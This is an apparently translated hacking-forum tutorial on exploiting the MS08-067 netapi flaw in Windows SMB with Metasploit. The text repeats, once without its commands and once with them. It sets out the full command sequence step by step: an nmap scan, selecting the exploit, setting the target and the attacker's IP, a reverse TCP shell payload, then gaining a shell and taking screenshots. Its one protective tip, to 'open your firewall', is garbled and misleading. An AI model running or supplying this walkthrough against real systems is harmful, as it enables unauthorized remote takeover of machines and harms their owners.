Hi TurkHackTeam members.
In this article, i will speak about Netapi (MS08-067) vulnerable and about exploiting it. I start with definitions.
What is NETAPI (MS08-067) Vulnerable ?
This vulnerable is result of a decomposition error in SMB module which is in netapi.dll. If attacker can exploit that vulnerable, he/she can run a code in target system as an full authorized. You need to still open your firewall for protect yourself from that attackers.
NETAPI (MS08-067) Vulnerable and Exploiting It
Now we'll try to get running code authority in target system with exploiting to that Netapi vulnerable.
First, we'll write this command. And we'll scan ports which have vulnerable in target system.
As you can see there is an vulnerable in 445 port. We'll try to penetrate to target system with using that netapi vulnerable. Now, we are opening métasploit with this code;
We are searching our exploit with typing this code;
We are selecting that exploit with this command;
We are typing this code for looking exploit's necessitys.
As you can see that wants to some various informations. We need to type RHOST information out of default informations. So, we'll indicate target system's IP address with this code;
We'll indicate our payload. We'll use shell_reverse_tcp payload. So, we'll indicate our payload like this;
We'll look wanted informations with typing this code;
As you can see there is an undefined LHOST information. We'll type our machine's IP address in here. Enter this code;
We are running our payload now;
As you can see, we penetrated to target system. We can run commands over system now. We can run commands which we want to run now. For this, type this command;
You can use this command for take screenshot;
Source: https://www.turkhackteam.org/siber-guvenlik/1922792-netapi-zafiyeti-ve-zafiyetin-somurulmesi.html
Translator: M3m0ry
In this article, i will speak about Netapi (MS08-067) vulnerable and about exploiting it. I start with definitions.
What is NETAPI (MS08-067) Vulnerable ?
This vulnerable is result of a decomposition error in SMB module which is in netapi.dll. If attacker can exploit that vulnerable, he/she can run a code in target system as an full authorized. You need to still open your firewall for protect yourself from that attackers.
NETAPI (MS08-067) Vulnerable and Exploiting It
Now we'll try to get running code authority in target system with exploiting to that Netapi vulnerable.
First, we'll write this command. And we'll scan ports which have vulnerable in target system.
Kod:
nmap -sT -A ip_address
As you can see there is an vulnerable in 445 port. We'll try to penetrate to target system with using that netapi vulnerable. Now, we are opening métasploit with this code;
Kod:
msfconsole
We are searching our exploit with typing this code;
Kod:
search ms08-067
We are selecting that exploit with this command;
Kod:
use exploit/windows/smb/ms08_067_netapi
We are typing this code for looking exploit's necessitys.
Kod:
options
As you can see that wants to some various informations. We need to type RHOST information out of default informations. So, we'll indicate target system's IP address with this code;
Kod:
set RHOSTS ip_address
We'll indicate our payload. We'll use shell_reverse_tcp payload. So, we'll indicate our payload like this;
Kod:
set PAYLOAD windows/shell_reverse_tcp
We'll look wanted informations with typing this code;
Kod:
options
As you can see there is an undefined LHOST information. We'll type our machine's IP address in here. Enter this code;
Kod:
set LHOST out_ip_address
We are running our payload now;
Kod:
exploit
As you can see, we penetrated to target system. We can run commands over system now. We can run commands which we want to run now. For this, type this command;
Kod:
shell
You can use this command for take screenshot;
Kod:
screenshot
Source: https://www.turkhackteam.org/siber-guvenlik/1922792-netapi-zafiyeti-ve-zafiyetin-somurulmesi.html
Translator: M3m0ry
Moderatör tarafında düzenlendi: